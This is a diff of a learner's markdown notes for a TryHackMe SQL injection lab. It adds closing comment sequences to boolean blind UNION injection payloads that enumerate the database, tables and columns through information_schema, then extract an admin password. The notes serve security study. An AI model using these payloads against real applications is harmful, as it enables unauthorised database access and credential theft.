Trogloduck/public/Cyber notes/00 THM/THM Jr Penetration Tester/01 Introduction to Web Hacking/11 SQL Injection.md

    The name of the database is `sqli_three`
 6. Repeat process for tables (with `information_schema.tables`): `admin1' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';--`
    --> we discover a table called `users`
-7. Repeat process for columns: `admin1' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%';`
+7. Repeat process for columns: `admin1' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%';--`
 8. After finding the column `id`, exclude it from the search: `and COLUMN_NAME !='id'`
-9. We found a column called "username", we will test for usernames: `admin1' UNION SELECT 1,2,3 from users where username like 'a%`
+9. We found a column called "username", we will test for usernames: `admin1' UNION SELECT 1,2,3 from users where username like 'a%';--`
    We confirm the existence of `admin`
-10. We test for passwords: `admin1' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%` We find the password `3845`
+10. We test for passwords: `admin1' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%';--` We find the password `3845`

 #### Time-Based